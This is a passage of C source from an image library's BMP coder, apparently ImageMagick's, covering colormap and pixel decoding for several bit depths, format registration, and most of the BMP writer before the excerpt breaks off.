image->storage_class=PseudoClass;
image->colors=bmp_info.number_colors;
one=1;
if (image->colors == 0)
image->colors=one << bmp_info.bits_per_pixel;
}
if (image->storage_class == PseudoClass)
{
unsigned char
*bmp_colormap;
size_t
packet_size;
/*
Read BMP raster colormap.
*/
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Reading colormap of %.20g colors",(double) image->colors);
if (AcquireImageColormap(image,image->colors,exception) == MagickFalse)
ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed");
bmp_colormap=(unsigned char *) AcquireQuantumMemory((size_t)
image->colors,4*sizeof(*bmp_colormap));
if (bmp_colormap == (unsigned char *) NULL)
ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed");
if ((bmp_info.size == 12) || (bmp_info.size == 64))
packet_size=3;
else
packet_size=4;
offset=SeekBlob(image,start_position+14+bmp_info.size,SEEK_SET);
if (offset < 0)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
count=ReadBlob(image,packet_size*image->colors,bmp_colormap);
if (count != (ssize_t) (packet_size*image->colors))
ThrowReaderException(CorruptImageError,"InsufficientImageDataInFile");
p=bmp_colormap;
for (i=0; i < (ssize_t) image->colors; i++)
{
image->colormap[i].blue=(MagickRealType) ScaleCharToQuantum(*p++);
image->colormap[i].green=(MagickRealType) ScaleCharToQuantum(*p++);
image->colormap[i].red=(MagickRealType) ScaleCharToQuantum(*p++);
if (packet_size == 4)
p++;
}
bmp_colormap=(unsigned char *) RelinquishMagickMemory(bmp_colormap);
}
image->resolution.x=(double) bmp_info.x_pixels/100.0;
image->resolution.y=(double) bmp_info.y_pixels/100.0;
image->units=PixelsPerCentimeterResolution;
if ((image_info->ping != MagickFalse) && (image_info->number_scenes != 0))
if (image->scene >= (image_info->scene+image_info->number_scenes-1))
break;
status=SetImageExtent(image,image->columns,image->rows,exception);
if (status == MagickFalse)
return(DestroyImageList(image));
/*
Read image data.
*/
offset=SeekBlob(image,start_position+bmp_info.offset_bits,SEEK_SET);
if (offset < 0)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
if (bmp_info.compression == BI_RLE4)
bmp_info.bits_per_pixel<<=1;
bytes_per_line=4*((image->columns*bmp_info.bits_per_pixel+31)/32);
length=(size_t) bytes_per_line*image->rows;
pixel_info=AcquireVirtualMemory((size_t) image->rows,
MagickMax(bytes_per_line,image->columns+256UL)*sizeof(*pixels));
if (pixel_info == (MemoryInfo *) NULL)
ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed");
pixels=(unsigned char *) GetVirtualMemoryBlob(pixel_info);
if ((bmp_info.compression == BI_RGB) ||
(bmp_info.compression == BI_BITFIELDS))
{
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Reading pixels (%.20g bytes)",(double) length);
count=ReadBlob(image,length,pixels);
if (count != (ssize_t) length)
{
pixel_info=RelinquishVirtualMemory(pixel_info);
ThrowReaderException(CorruptImageError,
"InsufficientImageDataInFile");
}
}
else
{
/*
Convert run-length encoded raster pixels.
*/
status=DecodeImage(image,bmp_info.compression,pixels);
if (status == MagickFalse)
{
pixel_info=RelinquishVirtualMemory(pixel_info);
ThrowReaderException(CorruptImageError,
"UnableToRunlengthDecodeImage");
}
}
/*
Convert BMP raster image to pixel packets.
*/
if (bmp_info.compression == BI_RGB)
{
/*
We should ignore the alpha value in BMP3 files but there have been
reports about 32 bit files with alpha. We do a quick check to see if
the alpha channel contains a value that is not zero (default value).
If we find a non zero value we asume the program that wrote the file
wants to use the alpha channel.
*/
if ((image->alpha_trait == UndefinedPixelTrait) && (bmp_info.size == 40) &&
(bmp_info.bits_per_pixel == 32))
{
bytes_per_line=4*(image->columns);
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
p=pixels+(image->rows-y-1)*bytes_per_line;
for (x=0; x < (ssize_t) image->columns; x++)
{
if (*(p+3) != 0)
{
image->alpha_trait=BlendPixelTrait;
y=-1;
break;
}
p+=4;
}
}
}
bmp_info.alpha_mask=image->alpha_trait != UndefinedPixelTrait ?
0xff000000U : 0U;
bmp_info.red_mask=0x00ff0000U;
bmp_info.green_mask=0x0000ff00U;
bmp_info.blue_mask=0x000000ffU;
if (bmp_info.bits_per_pixel == 16)
{
/*
RGB555.
*/
bmp_info.red_mask=0x00007c00U;
bmp_info.green_mask=0x000003e0U;
bmp_info.blue_mask=0x0000001fU;
}
}
(void) ResetMagickMemory(&shift,0,sizeof(shift));
(void) ResetMagickMemory(&quantum_bits,0,sizeof(quantum_bits));
if ((bmp_info.bits_per_pixel == 16) || (bmp_info.bits_per_pixel == 32))
{
register size_t
sample;
/*
Get shift and quantum bits info from bitfield masks.
*/
if (bmp_info.red_mask != 0)
while (((bmp_info.red_mask << shift.red) & 0x80000000UL) == 0)
shift.red++;
if (bmp_info.green_mask != 0)
while (((bmp_info.green_mask << shift.green) & 0x80000000UL) == 0)
shift.green++;
if (bmp_info.blue_mask != 0)
while (((bmp_info.blue_mask << shift.blue) & 0x80000000UL) == 0)
shift.blue++;
if (bmp_info.alpha_mask != 0)
while (((bmp_info.alpha_mask << shift.alpha) & 0x80000000UL) == 0)
shift.alpha++;
sample=shift.red;
while (((bmp_info.red_mask << sample) & 0x80000000UL) != 0)
sample++;
quantum_bits.red=(MagickRealType) (sample-shift.red);
sample=shift.green;
while (((bmp_info.green_mask << sample) & 0x80000000UL) != 0)
sample++;
quantum_bits.green=(MagickRealType) (sample-shift.green);
sample=shift.blue;
while (((bmp_info.blue_mask << sample) & 0x80000000UL) != 0)
sample++;
quantum_bits.blue=(MagickRealType) (sample-shift.blue);
sample=shift.alpha;
while (((bmp_info.alpha_mask << sample) & 0x80000000UL) != 0)
sample++;
quantum_bits.alpha=(MagickRealType) (sample-shift.alpha);
}
switch (bmp_info.bits_per_pixel)
{
case 1:
{
/*
Convert bitmap scanline.
*/
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
p=pixels+(image->rows-y-1)*bytes_per_line;
q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
if (q == (Quantum *) NULL)
break;
for (x=0; x < ((ssize_t) image->columns-7); x+=8)
{
for (bit=0; bit < 8; bit++)
{
index=(Quantum) (((*p) & (0x80 >> bit)) != 0 ? 0x01 : 0x00);
SetPixelIndex(image,index,q);
q+=GetPixelChannels(image);
}
p++;
}
if ((image->columns % 8) != 0)
{
for (bit=0; bit < (image->columns % 8); bit++)
{
index=(Quantum) (((*p) & (0x80 >> bit)) != 0 ? 0x01 : 0x00);
SetPixelIndex(image,index,q);
q+=GetPixelChannels(image);
}
p++;
}
if (SyncAuthenticPixels(image,exception) == MagickFalse)
break;
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType)
(image->rows-y),image->rows);
if (status == MagickFalse)
break;
}
}
(void) SyncImage(image,exception);
break;
}
case 4:
{
/*
Convert PseudoColor scanline.
*/
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
p=pixels+(image->rows-y-1)*bytes_per_line;
q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
if (q == (Quantum *) NULL)
break;
for (x=0; x < ((ssize_t) image->columns-1); x+=2)
{
ValidateColormapValue(image,(*p >> 4) & 0x0f,&index,exception);
SetPixelIndex(image,index,q);
q+=GetPixelChannels(image);
ValidateColormapValue(image,*p & 0x0f,&index,exception);
SetPixelIndex(image,index,q);
q+=GetPixelChannels(image);
p++;
}
if ((image->columns % 2) != 0)
{
ValidateColormapValue(image,(*p >> 4) & 0xf,&index,exception);
SetPixelIndex(image,index,q);
q+=GetPixelChannels(image);
p++;
x++;
}
if (x < (ssize_t) image->columns)
break;
if (SyncAuthenticPixels(image,exception) == MagickFalse)
break;
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType)
(image->rows-y),image->rows);
if (status == MagickFalse)
break;
}
}
(void) SyncImage(image,exception);
break;
}
case 8:
{
/*
Convert PseudoColor scanline.
*/
if ((bmp_info.compression == BI_RLE8) ||
(bmp_info.compression == BI_RLE4))
bytes_per_line=image->columns;
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
p=pixels+(image->rows-y-1)*bytes_per_line;
q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
if (q == (Quantum *) NULL)
break;
for (x=(ssize_t) image->columns; x != 0; --x)
{
ValidateColormapValue(image,*p++,&index,exception);
SetPixelIndex(image,index,q);
q+=GetPixelChannels(image);
}
if (x > 0)
break;
if (SyncAuthenticPixels(image,exception) == MagickFalse)
break;
offset=(MagickOffsetType) (image->rows-y-1);
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType)
(image->rows-y),image->rows);
if (status == MagickFalse)
break;
}
}
(void) SyncImage(image,exception);
break;
}
case 16:
{
size_t
alpha,
pixel;
/*
Convert bitfield encoded 16-bit PseudoColor scanline.
*/
if (bmp_info.compression != BI_RGB &&
bmp_info.compression != BI_BITFIELDS)
{
pixel_info=RelinquishVirtualMemory(pixel_info);
ThrowReaderException(CorruptImageError,
"UnrecognizedImageCompression");
}
bytes_per_line=2*(image->columns+image->columns % 2);
image->storage_class=DirectClass;
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
p=pixels+(image->rows-y-1)*bytes_per_line;
q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
if (q == (Quantum *) NULL)
break;
for (x=0; x < (ssize_t) image->columns; x++)
{
pixel=(size_t) (*p++);
pixel|=(*p++) << 8;
red=((pixel & bmp_info.red_mask) << shift.red) >> 16;
if (quantum_bits.red == 5)
red|=((red & 0xe000) >> 5);
if (quantum_bits.red <= 8)
red|=((red & 0xff00) >> 8);
green=((pixel & bmp_info.green_mask) << shift.green) >> 16;
if (quantum_bits.green == 5)
green|=((green & 0xe000) >> 5);
if (quantum_bits.green == 6)
green|=((green & 0xc000) >> 6);
if (quantum_bits.green <= 8)
green|=((green & 0xff00) >> 8);
blue=((pixel & bmp_info.blue_mask) << shift.blue) >> 16;
if (quantum_bits.blue == 5)
blue|=((blue & 0xe000) >> 5);
if (quantum_bits.blue <= 8)
blue|=((blue & 0xff00) >> 8);
SetPixelRed(image,ScaleShortToQuantum((unsigned short) red),q);
SetPixelGreen(image,ScaleShortToQuantum((unsigned short) green),q);
SetPixelBlue(image,ScaleShortToQuantum((unsigned short) blue),q);
SetPixelAlpha(image,OpaqueAlpha,q);
if (image->alpha_trait != UndefinedPixelTrait)
{
alpha=((pixel & bmp_info.alpha_mask) << shift.alpha) >> 16;
if (quantum_bits.alpha <= 8)
alpha|=((alpha & 0xff00) >> 8);
SetPixelAlpha(image,ScaleShortToQuantum(
(unsigned short) alpha),q);
}
q+=GetPixelChannels(image);
}
if (SyncAuthenticPixels(image,exception) == MagickFalse)
break;
offset=(MagickOffsetType) (image->rows-y-1);
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType)
(image->rows-y),image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
case 24:
{
/*
Convert DirectColor scanline.
*/
bytes_per_line=4*((image->columns*24+31)/32);
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
p=pixels+(image->rows-y-1)*bytes_per_line;
q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
if (q == (Quantum *) NULL)
break;
for (x=0; x < (ssize_t) image->columns; x++)
{
SetPixelBlue(image,ScaleCharToQuantum(*p++),q);
SetPixelGreen(image,ScaleCharToQuantum(*p++),q);
SetPixelRed(image,ScaleCharToQuantum(*p++),q);
SetPixelAlpha(image,OpaqueAlpha,q);
q+=GetPixelChannels(image);
}
if (SyncAuthenticPixels(image,exception) == MagickFalse)
break;
offset=(MagickOffsetType) (image->rows-y-1);
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType)
(image->rows-y),image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
case 32:
{
/*
Convert bitfield encoded DirectColor scanline.
*/
if ((bmp_info.compression != BI_RGB) &&
(bmp_info.compression != BI_BITFIELDS))
{
pixel_info=RelinquishVirtualMemory(pixel_info);
ThrowReaderException(CorruptImageError,
"UnrecognizedImageCompression");
}
bytes_per_line=4*(image->columns);
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
size_t
alpha,
pixel;
p=pixels+(image->rows-y-1)*bytes_per_line;
q=QueueAuthenticPixels(image,0,y,image->columns,1,exception);
if (q == (Quantum *) NULL)
break;
for (x=0; x < (ssize_t) image->columns; x++)
{
pixel=(size_t) (*p++);
pixel|=((size_t) *p++ << 8);
pixel|=((size_t) *p++ << 16);
pixel|=((size_t) *p++ << 24);
red=((pixel & bmp_info.red_mask) << shift.red) >> 16;
if (quantum_bits.red == 8)
red|=(red >> 8);
green=((pixel & bmp_info.green_mask) << shift.green) >> 16;
if (quantum_bits.green == 8)
green|=(green >> 8);
blue=((pixel & bmp_info.blue_mask) << shift.blue) >> 16;
if (quantum_bits.blue == 8)
blue|=(blue >> 8);
SetPixelRed(image,ScaleShortToQuantum((unsigned short) red),q);
SetPixelGreen(image,ScaleShortToQuantum((unsigned short) green),q);
SetPixelBlue(image,ScaleShortToQuantum((unsigned short) blue),q);
SetPixelAlpha(image,OpaqueAlpha,q);
if (image->alpha_trait != UndefinedPixelTrait)
{
alpha=((pixel & bmp_info.alpha_mask) << shift.alpha) >> 16;
if (quantum_bits.alpha == 8)
alpha|=(alpha >> 8);
SetPixelAlpha(image,ScaleShortToQuantum(
(unsigned short) alpha),q);
}
q+=GetPixelChannels(image);
}
if (SyncAuthenticPixels(image,exception) == MagickFalse)
break;
offset=(MagickOffsetType) (image->rows-y-1);
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType)
(image->rows-y),image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
default:
{
pixel_info=RelinquishVirtualMemory(pixel_info);
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
}
}
pixel_info=RelinquishVirtualMemory(pixel_info);
if (y > 0)
break;
if (EOFBlob(image) != MagickFalse)
{
ThrowFileException(exception,CorruptImageError,"UnexpectedEndOfFile",
image->filename);
break;
}
if (bmp_info.height < 0)
{
Image
*flipped_image;
/*
Correct image orientation.
*/
flipped_image=FlipImage(image,exception);
if (flipped_image != (Image *) NULL)
{
DuplicateBlob(flipped_image,image);
image=DestroyImage(image);
image=flipped_image;
}
}
/*
Proceed to next image.
*/
if (image_info->number_scenes != 0)
if (image->scene >= (image_info->scene+image_info->number_scenes-1))
break;
*magick='\0';
if (bmp_info.ba_offset != 0)
{
offset=SeekBlob(image,(MagickOffsetType) bmp_info.ba_offset,SEEK_SET);
if (offset < 0)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
}
count=ReadBlob(image,2,magick);
if ((count == 2) && (IsBMP(magick,2) != MagickFalse))
{
/*
Acquire next image structure.
*/
AcquireNextImage(image_info,image,exception);
if (GetNextImageInList(image) == (Image *) NULL)
{
image=DestroyImageList(image);
return((Image *) NULL);
}
image=SyncNextImageInList(image);
status=SetImageProgress(image,LoadImagesTag,TellBlob(image),
GetBlobSize(image));
if (status == MagickFalse)
break;
}
} while (IsBMP(magick,2) != MagickFalse);
(void) CloseBlob(image);
return(GetFirstImageInList(image));
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% R e g i s t e r B M P I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% RegisterBMPImage() adds attributes for the BMP image format to
% the list of supported formats. The attributes include the image format
% tag, a method to read and/or write the format, whether the format
% supports the saving of more than one frame to the same file or blob,
% whether the format supports native in-memory I/O, and a brief
% description of the format.
%
% The format of the RegisterBMPImage method is:
%
% size_t RegisterBMPImage(void)
%
*/
ModuleExport size_t RegisterBMPImage(void)
{
MagickInfo
*entry;
entry=AcquireMagickInfo("BMP","BMP","Microsoft Windows bitmap image");
entry->decoder=(DecodeImageHandler *) ReadBMPImage;
entry->encoder=(EncodeImageHandler *) WriteBMPImage;
entry->magick=(IsImageFormatHandler *) IsBMP;
entry->flags^=CoderAdjoinFlag;
entry->flags|=CoderSeekableStreamFlag;
(void) RegisterMagickInfo(entry);
entry=AcquireMagickInfo("BMP","BMP2","Microsoft Windows bitmap image (V2)");
entry->encoder=(EncodeImageHandler *) WriteBMPImage;
entry->magick=(IsImageFormatHandler *) IsBMP;
entry->flags^=CoderAdjoinFlag;
entry->flags|=CoderSeekableStreamFlag;
(void) RegisterMagickInfo(entry);
entry=AcquireMagickInfo("BMP","BMP3","Microsoft Windows bitmap image (V3)");
entry->encoder=(EncodeImageHandler *) WriteBMPImage;
entry->magick=(IsImageFormatHandler *) IsBMP;
entry->flags^=CoderAdjoinFlag;
entry->flags|=CoderSeekableStreamFlag;
(void) RegisterMagickInfo(entry);
return(MagickImageCoderSignature);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% U n r e g i s t e r B M P I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% UnregisterBMPImage() removes format registrations made by the
% BMP module from the list of supported formats.
%
% The format of the UnregisterBMPImage method is:
%
% UnregisterBMPImage(void)
%
*/
ModuleExport void UnregisterBMPImage(void)
{
(void) UnregisterMagickInfo("BMP");
(void) UnregisterMagickInfo("BMP2");
(void) UnregisterMagickInfo("BMP3");
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% W r i t e B M P I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% WriteBMPImage() writes an image in Microsoft Windows bitmap encoded
% image format, version 3 for Windows or (if the image has a matte channel)
% version 4.
%
% The format of the WriteBMPImage method is:
%
% MagickBooleanType WriteBMPImage(const ImageInfo *image_info,
% Image *image,ExceptionInfo *exception)
%
% A description of each parameter follows.
%
% o image_info: the image info.
%
% o image: The image.
%
% o exception: return any errors or warnings in this structure.
%
*/
static MagickBooleanType WriteBMPImage(const ImageInfo *image_info,Image *image,
ExceptionInfo *exception)
{
BMPInfo
bmp_info;
const char
*option;
const StringInfo
*profile;
MagickBooleanType
have_color_info,
status;
MagickOffsetType
scene;
MemoryInfo
*pixel_info;
register const Quantum
*p;
register ssize_t
i,
x;
register unsigned char
*q;
size_t
bytes_per_line,
type;
ssize_t
y;
unsigned char
*bmp_data,
*pixels;
/*
Open output image file.
*/
assert(image_info != (const ImageInfo *) NULL);
assert(image_info->signature == MagickCoreSignature);
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
status=OpenBlob(image_info,image,WriteBinaryBlobMode,exception);
if (status == MagickFalse)
return(status);
type=4;
if (LocaleCompare(image_info->magick,"BMP2") == 0)
type=2;
else
if (LocaleCompare(image_info->magick,"BMP3") == 0)
type=3;
option=GetImageOption(image_info,"bmp:format");
if (option != (char *) NULL)
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Format=%s",option);
if (LocaleCompare(option,"bmp2") == 0)
type=2;
if (LocaleCompare(option,"bmp3") == 0)
type=3;
if (LocaleCompare(option,"bmp4") == 0)
type=4;
}
scene=0;
do
{
/*
Initialize BMP raster file header.
*/
(void) TransformImageColorspace(image,sRGBColorspace,exception);
(void) ResetMagickMemory(&bmp_info,0,sizeof(bmp_info));
bmp_info.file_size=14+12;
if (type > 2)
bmp_info.file_size+=28;
bmp_info.offset_bits=bmp_info.file_size;
bmp_info.compression=BI_RGB;
if ((image->storage_class == PseudoClass) && (image->colors > 256))
(void) SetImageStorageClass(image,DirectClass,exception);
if (image->storage_class != DirectClass)
{
/*
Colormapped BMP raster.
*/
bmp_info.bits_per_pixel=8;
if (image->colors <= 2)
bmp_info.bits_per_pixel=1;
else
if (image->colors <= 16)
bmp_info.bits_per_pixel=4;
else
if (image->colors <= 256)
bmp_info.bits_per_pixel=8;
if (image_info->compression == RLECompression)
bmp_info.bits_per_pixel=8;
bmp_info.number_colors=1U << bmp_info.bits_per_pixel;
if (image->alpha_trait != UndefinedPixelTrait)
(void) SetImageStorageClass(image,DirectClass,exception);
else
if ((size_t) bmp_info.number_colors < image->colors)
(void) SetImageStorageClass(image,DirectClass,exception);
else
{
bmp_info.file_size+=3*(1UL << bmp_info.bits_per_pixel);
bmp_info.offset_bits+=3*(1UL << bmp_info.bits_per_pixel);
if (type > 2)
{
bmp_info.file_size+=(1UL << bmp_info.bits_per_pixel);
bmp_info.offset_bits+=(1UL << bmp_info.bits_per_pixel);
}
}
}
if (image->storage_class == DirectClass)
{
/*
Full color BMP raster.
*/
bmp_info.number_colors=0;
bmp_info.bits_per_pixel=(unsigned short)
((type > 3) && (image->alpha_trait != UndefinedPixelTrait) ? 32 : 24);
bmp_info.compression=(unsigned int) ((type > 3) &&
(image->alpha_trait != UndefinedPixelTrait) ? BI_BITFIELDS : BI_RGB);
if ((type == 3) && (image->alpha_trait != UndefinedPixelTrait))
{
option=GetImageOption(image_info,"bmp3:alpha");
if (IsStringTrue(option))
bmp_info.bits_per_pixel=32;
}
}
bytes_per_line=4*((image->columns*bmp_info.bits_per_pixel+31)/32);
bmp_info.ba_offset=0;
profile=GetImageProfile(image,"icc");
have_color_info=(image->rendering_intent != UndefinedIntent) ||
(profile != (StringInfo *) NULL) || (image->gamma != 0.0) ? MagickTrue :
MagickFalse;
if (type == 2)
bmp_info.size=12;
else
if ((type == 3) || ((image->alpha_trait == UndefinedPixelTrait) &&
(have_color_info == MagickFalse)))
{
type=3;
bmp_info.size=40;
}
else
{
int
extra_size;
bmp_info.size=108;
extra_size=68;
if ((image->rendering_intent != UndefinedIntent) ||
(profile != (StringInfo *) NULL))
{
bmp_info.size=124;
extra_size+=16;
}
bmp_info.file_size+=extra_size;
bmp_info.offset_bits+=extra_size;
}
if ((image->columns != (signed int) image->columns) ||
(image->rows != (signed int) image->rows))
ThrowWriterException(ImageError,"WidthOrHeightExceedsLimit");
bmp_info.width=(ssize_t) image->columns;
bmp_info.height=(ssize_t) image->rows;
bmp_info.planes=1;
bmp_info.image_size=(unsigned long) (bytes_per_line*image->rows);
bmp_info.file_size+=bmp_info.image_size;
bmp_info.x_pixels=75*39;
bmp_info.y_pixels=75*39;
switch (image->units)
{
case UndefinedResolution:
case PixelsPerInchResolution:
{
bmp_info.x_pixels=(unsigned int) (100.0*image->resolution.x/2.54);
bmp_info.y_pixels=(unsigned int) (100.0*image->resolution.y/2.54);
break;
}
case PixelsPerCentimeterResolution:
{
bmp_info.x_pixels=(unsigned int) (100.0*image->resolution.x);
bmp_info.y_pixels=(unsigned int) (100.0*image->resolution.y);
break;
}
}
bmp_info.colors_important=bmp_info.number_colors;
/*
Convert MIFF to BMP raster pixels.
*/
pixel_info=AcquireVirtualMemory((size_t) bmp_info.image_size,
sizeof(*pixels));
if (pixel_info == (MemoryInfo *) NULL)
ThrowWriterException(ResourceLimitError,"MemoryAllocationFailed");
pixels=(unsigned char *) GetVirtualMemoryBlob(pixel_info);
(void) ResetMagickMemory(pixels,0,(size_t) bmp_info.image_size);
switch (bmp_info.bits_per_pixel)
{
case 1:
{
size_t
bit,
byte;
/*
Convert PseudoClass image to a BMP monochrome image.
*/
for (y=0; y < (ssize_t) image->rows; y++)
{
ssize_t
offset;
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
q=pixels+(image->rows-y-1)*bytes_per_line;
bit=0;
byte=0;
for (x=0; x < (ssize_t) image->columns; x++)
{
byte<<=1;
byte|=GetPixelIndex(image,p) != 0 ? 0x01 : 0x00;
bit++;
if (bit == 8)
{
*q++=(unsigned char) byte;
bit=0;
byte=0;
}
p+=GetPixelChannels(image);
}
if (bit != 0)
{
*q++=(unsigned char) (byte << (8-bit));
x++;
}
offset=(ssize_t) (image->columns+7)/8;
for (x=offset; x < (ssize_t) bytes_per_line; x++)
*q++=0x00;
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
case 4:
{
size_t
byte,
nibble;
ssize_t
offset;
/*
Convert PseudoClass image to a BMP monochrome image.
*/
for (y=0; y < (ssize_t) image->rows; y++)
{
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
q=pixels+(image->rows-y-1)*bytes_per_line;
nibble=0;
byte=0;
for (x=0; x < (ssize_t) image->columns; x++)
{
byte<<=4;
byte|=((size_t) GetPixelIndex(image,p) & 0x0f);
nibble++;
if (nibble == 2)
{
*q++=(unsigned char) byte;
nibble=0;
byte=0;
}
p+=GetPixelChannels(image);
}
if (nibble != 0)
{
*q++=(unsigned char) (byte << 4);
x++;
}
offset=(ssize_t) (image->columns+1)/2;
for (x=offset; x < (ssize_t) bytes_per_line; x++)
*q++=0x00;
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
case 8:
{
/*
Convert PseudoClass packet to BMP pixel.
*/
for (y=0; y < (ssize_t) image->rows; y++)
{
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
q=pixels+(image->rows-y-1)*bytes_per_line;
for (x=0; x < (ssize_t) image->columns; x++)
{
*q++=(unsigned char) GetPixelIndex(image,p);
p+=GetPixelChannels(image);
}
for ( ; x < (ssize_t) bytes_per_line; x++)
*q++=0x00;
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
case 24:
{
/*
Convert DirectClass packet to BMP BGR888.
*/
for (y=0; y < (ssize_t) image->rows; y++)
{
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
q=pixels+(image->rows-y-1)*bytes_per_line;
for (x=0; x < (ssize_t) image->columns; x++)
{
*q++=ScaleQuantumToChar(GetPixelBlue(image,p));
*q++=ScaleQuantumToChar(GetPixelGreen(image,p));
*q++=ScaleQuantumToChar(GetPixelRed(image,p));
p+=GetPixelChannels(image);
}
for (x=3L*(ssize_t) image->columns; x < (ssize_t) bytes_per_line; x++)
*q++=0x00;
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
case 32:
{
/*
Convert DirectClass packet to ARGB8888 pixel.
*/
for (y=0; y < (ssize_t) image->rows; y++)
{
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
q=pixels+(image->rows-y-1)*bytes_per_line;
for (x=0; x < (ssize_t) image->columns; x++)
{
*q++=ScaleQuantumToChar(GetPixelBlue(image,p));
*q++=ScaleQuantumToChar(GetPixelGreen(image,p));
*q++=ScaleQuantumToChar(GetPixelRed(image,p));
*q++=ScaleQuantumToChar(GetPixelAlpha(image,p));
p+=GetPixelChannels(image);
}
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
}
if ((type > 2) && (bmp_info.bits_per_pixel == 8))
if (image_info->compression != NoCompression)
{
MemoryInfo
*rle_info;
/*
Convert run-length encoded raster pixels.
*/
rle_info=AcquireVirtualMemory((size_t) (2*(bytes_per_line+2)+2),
(image->rows+2)*sizeof(*pixels));
if (rle_info == (MemoryInfo *) NULL)
{
pixel_info=RelinquishVirtualMemory(pixel_info);
ThrowWriterException(ResourceLimitError,"MemoryAllocationFailed");
}
bmp_data=(unsigned char *) GetVirtualMemoryBlob(rle_info);
bmp_info.file_size-=bmp_info.image_size;
bmp_info.image_size=(unsigned int) EncodeImage(image,bytes_per_line,
pixels,bmp_data);
bmp_info.file_size+=bmp_info.image_size;
pixel_info=RelinquishVirtualMemory(pixel_info);
pixel_info=rle_info;
pixels=bmp_data;
bmp_info.compression=BI_RLE8;
}
/*
Write BMP for Windows, all versions, 14-byte header.
*/
if (image->debug != MagickFalse)
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Writing BMP version %.20g datastream",(double) type);
if (image->storage_class == DirectClass)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Storage class=DirectClass");
else
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Storage class=PseudoClass");
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Image depth=%.20g",(double) image->depth);
if (image->alpha_trait != UndefinedPixelTrait)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Matte=True");
else
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Matte=MagickFalse");
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" BMP bits_per_pixel=%.20g",(double) bmp_info.bits_per_pixel);
switch ((int) bmp_info.compression)
{
case BI_RGB:
{
